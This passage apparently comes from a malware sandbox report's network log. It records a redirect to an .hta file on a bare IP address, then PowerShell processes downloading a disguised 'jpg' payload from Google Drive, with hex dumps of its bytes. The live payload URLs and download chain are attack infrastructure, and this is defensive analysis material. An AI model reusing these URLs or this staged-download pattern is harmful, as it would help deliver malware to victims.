                                                                                                    Location: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
                                                                                                    Vary: Accept
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXjPetw6GGNhSL6K04KroToAVRVl%2FZJocZWUcKQzYxRO07VQJxUWi7RnR%2By3ANWD9E%2FcNgvrrnQXWQyHyCI0GgkqCptHnlwVlJJCm0Qk4yc6VvMb1aSFCvQZXJxr"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8da20bd73d3583a7-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1059&delivery_rate=1806612&cwnd=247&unsent_bytes=0&cid=19d353a24be06309&ts=401&x=0"
                                                                                                    2024-10-29 09:12:51 UTC111INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 35 2f 34 32 32 2f 73 77 2f 6e 69 63 65 6c 6f 6f 6b 67 69 72 6c 66 72 69 6e 65 64 6f 6e 6d 79 68 65 61 72 74 73 68 65 67 6f 6f 64 66 6f 72 62 65 73 74 74 68 69 67 6e 73 74 6f 64 6f 66 6f 72 6d 65 2e 68 74 61
                                                                                                    Data Ascii: Found. Redirecting to http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.2249173142.250.185.974432692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:12:51 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                    Host: drive.usercontent.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:12:53 UTC4906INHTTP/1.1 200 OK
                                                                                                    Content-Type: image/jpeg
                                                                                                    Content-Security-Policy: sandbox
                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 2239109
                                                                                                    Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                    X-GUploader-UploadID: AHmUCY3jvO9_2_-MxtjO1Fux5oOBDBlfBa95ZqKFAFDAGyn1DA5rE1yCLQ-E3phM5_9nMUaKArR5QyqTgQ
                                                                                                    Date: Tue, 29 Oct 2024 09:12:53 GMT
                                                                                                    Expires: Tue, 29 Oct 2024 09:12:53 GMT
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    X-Goog-Hash: crc32c=WqxmdA==
                                                                                                    Server: UploadServer
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2024-10-29 09:12:53 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                    2024-10-29 09:12:53 UTC4886INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                                    Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                                    2024-10-29 09:12:53 UTC1323INData Raw: 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23
                                                                                                    Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                                    Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                                    Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                                    Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                                    Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                                    Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                                    Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                                    2024-10-29 09:12:53 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                                    Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.2249175142.250.184.2064433860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:13:04 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                    Host: drive.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:13:04 UTC1319INHTTP/1.1 303 See Other
                                                                                                    Content-Type: application/binary
                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                    Date: Tue, 29 Oct 2024 09:13:04 GMT
                                                                                                    Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FVm90OVrJ7SuEiq4Xc8EBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                    Server: ESF
                                                                                                    Content-Length: 0
                                                                                                    X-XSS-Protection: 0
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.2249176142.250.185.974433860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-29 09:13:05 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                    Host: drive.usercontent.google.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-29 09:13:08 UTC4899INHTTP/1.1 200 OK
                                                                                                    Content-Type: image/jpeg
                                                                                                    Content-Security-Policy: sandbox
                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 2239109
                                                                                                    Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                    X-GUploader-UploadID: AHmUCY1IUzgwfqjbwnERzv8ryiglfd4Hh4mxqw1dWqYY4JwiIzdHUGrWwgGbCyi5-4ogvilFAAQ
                                                                                                    Date: Tue, 29 Oct 2024 09:13:07 GMT
                                                                                                    Expires: Tue, 29 Oct 2024 09:13:07 GMT
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    X-Goog-Hash: crc32c=WqxmdA==
                                                                                                    Server: UploadServer
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close
                                                                                                    2024-10-29 09:13:08 UTC4899INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                    2024-10-29 09:13:08 UTC4898INData Raw: d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80
                                                                                                    Data Ascii: *^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K
                                                                                                    2024-10-29 09:13:08 UTC1325INData Raw: 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66 23 78 60 7d b9 6c
                                                                                                    Data Ascii: &>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf#x`}l
